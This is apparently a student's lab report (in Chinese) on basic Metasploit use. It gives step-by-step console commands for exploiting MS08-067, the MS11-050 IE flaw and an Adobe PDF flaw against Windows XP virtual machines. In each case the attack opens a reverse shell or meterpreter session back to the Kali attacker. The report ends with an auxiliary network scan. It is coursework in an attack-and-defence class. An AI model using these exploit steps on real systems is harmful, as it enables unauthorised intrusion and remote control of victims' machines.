20155338 《网络攻防》Exp5 MSF基础应用
20155338 《网络攻防》Exp5 MSF基础应用
基础问题回答
1、 用自己的话解释什么是exploit,payload,encode?
- exploit将真正要负责攻击的代码传送到靶机中,相当于载具
- payload负责执行相应的攻击代码,相当于载荷
- encode是伪装,为了避免payload中坏字符影响功能,相当于编码
实验过程
Windows服务渗透攻击——MS08-067安全漏洞
- 攻击机:kali,ip:172.30.6.185
靶机:windows XP SP3,IP地址是172.30.7.99
先
msfconsole
进入msf,再用search ms08_067
查询一下针对该漏洞的攻击模块:
用
use exploit/windows/smb/ms08_067_netapi
使用该模块,并用show targets
查看可以被攻击的靶机的操作系统型号:
用
show payloads
查看可以供我们使用的攻击载:
从中找到一个可用的攻击载荷
generic/shell_reverse_tcp
,用set payload generic/shell_reverse_tcp
设置payload:
- 用
show options
查看需要设置的参数:
- 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置,并设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP3,所以选择34)
- 用
show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用exploit指令开始攻击:
- 攻击成功后会获取靶机的shell,可以对其进行操作:
针对浏览器的攻击:ms11_050
- 用
search ms11_050
查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块:
- 用info查看该模块的相关信息
- targets信息:
- options信息:
- 用
set payload windows/meterpreter/reverse_tcp
设置payload,并设置需要设置的参数。
- 用
show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:
- 在靶机IE上输入该网址:
- kali中显示session已经创建,输入sessions -i 1,获取靶机的shell,可以对其进行操作
针对客户端的攻击:adobe_toolbutton
- 用
search adobe
查询一下针对该漏洞的攻击模块:
- 选择一个模块并使用该模块:
- 用
show targets
查看可以被攻击的靶机的操作系统型号:
- 设置payload攻击载荷,命令
set payload windows/meterpreter/reverse_tcp
,设置相应参数,实施exploit攻击,发现在/root/.msf4/local/
目录下成功生成了一个csj5338.pdf文件:
- 将pdf文件粘贴到靶机win XP
- 在kali中和前几次实验一样打开并设置监听模块
use exploit/multi/handler
,set payload windows/meterpreter/reverse_tcp
,再设置IP以及端口
- 在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:
应用一个辅助模块:ipidseq
- 用
show auxiliary
查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq
:
- 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。
- 也可以对指定网段的主机进行扫描:
实验总结和收获
这次实验总体流程不算难,但在虚拟机上面我换了很多个,换了几个镜像,总算是用简体中文版成功了,学会了MSF工具的一些常用指令,也认识到在实际的渗透过程中,我们不能完全依靠msf来实现,漏洞也都是很早之前的漏洞,其实在现实生活中中攻击一台计算机还是有一定难度的。还是应该深入学习,加强自己的专业技能。
20155338 《网络攻防》Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 20145330 《网络攻防》 MSF基础应用
20145330 <网络攻防> MSF基础应用 1.实验后回答问题 (1)用自己的话解释什么是exploit,payload,encode. exploit:进行渗透攻击的模块合集 pay ...
- 《网络攻防》 MSF基础应用
20145224陈颢文 <网络攻防>MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode: exploit:攻击手段,是能使攻击武器(payloa ...
- 20145239杜文超《网络攻防》- MSF基础应用
20145239杜文超<网络攻防>- MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit:实现攻击行为的主体,但没有载荷只 ...
- 20145306 《网络攻防》 MSF基础应用
20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145334赵文豪《网络攻防》 MSF基础应用
实践目标 掌握metasploit的基本应用方式 掌握常用的三种攻击方式的思路. 实验要求 一个主动攻击,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adob ...
随机推荐
- objc与鸭子对象(上)
这是<objc与鸭子对象>的上半部分,<objc与鸭子对象(下)>中介绍了鸭子类型的进阶用法.依赖注入以及demo. 我是前言 鸭子类型(Duck Type)即:“当看到一只鸟 ...
- keystone令牌三种生成方式
keystone认证方式:UUID.PKI.Fernet; 知识点复习: 通俗的讲,token 是用户的一种凭证,需拿正确的用户名/密码向 Keystone 申请才能得到.如果用户每次都采用用户名/密 ...
- innodb 表锁和行锁
表锁 表锁相关结构: table->locks:数据字典table保存这个表上的所有表锁信息 trx->lock.table_locks:每个事务trx保存该事务所加的所有表锁信息 tr ...
- Python tuple
元组其实跟列表差不多,也是存一组数,只不是它一旦创建,便不能再修改,所以又叫只读列表 语法 names = (a,b,c) 它只有2个方法,一个是count,一个是index. 当然也有可变元祖: 可 ...
- 03-02_配置weblogic domain
配置Domain 图形化界面: [Windows] Windows菜单 [windows] config.cmd [Unix/Linux] config.sh 命令行界面: [windows] con ...
- Finding the source of signals on Linux with strace, auditd, or systemtap
inux and UNIX® like operating systems commonly use signals to communicate between processes. The use ...
- MySQL: Building the best INDEX for a given SELECT
Table of Contents The ProblemAlgorithmDigressionFirst, some examplesAlgorithm, Step 1 (WHERE "c ...
- PXE 和 计算机网络启动
1. 什么是PXE PXE(Pre-boot Execution Environment,预启动执行环境)是由Intel公司开发的最新技术,工作于Client/Server的网络模式,支持工作站通过网 ...
- jQuery插件实例四:手风琴效果[无动画版]
手风琴效果就是内容的折叠与打开,在这个插件中,使用了三种数据来源:1.直接写在DOM结构中:2.将数据写在配置项中:3.从Ajax()中获取数据.在这一版中,各项的切换没有添加动画效果,在下一版中会是 ...
- js 排序,去重
前几天 有一个需求要做一个 勾选的按钮 ,用的前端框架时 extjs . 需求是这样的:选择数据后点击勾选 会把数据 放到一个全局变量里,然后点击另外一个提交按钮 弹出一个窗口 加载这些已经勾选的 ...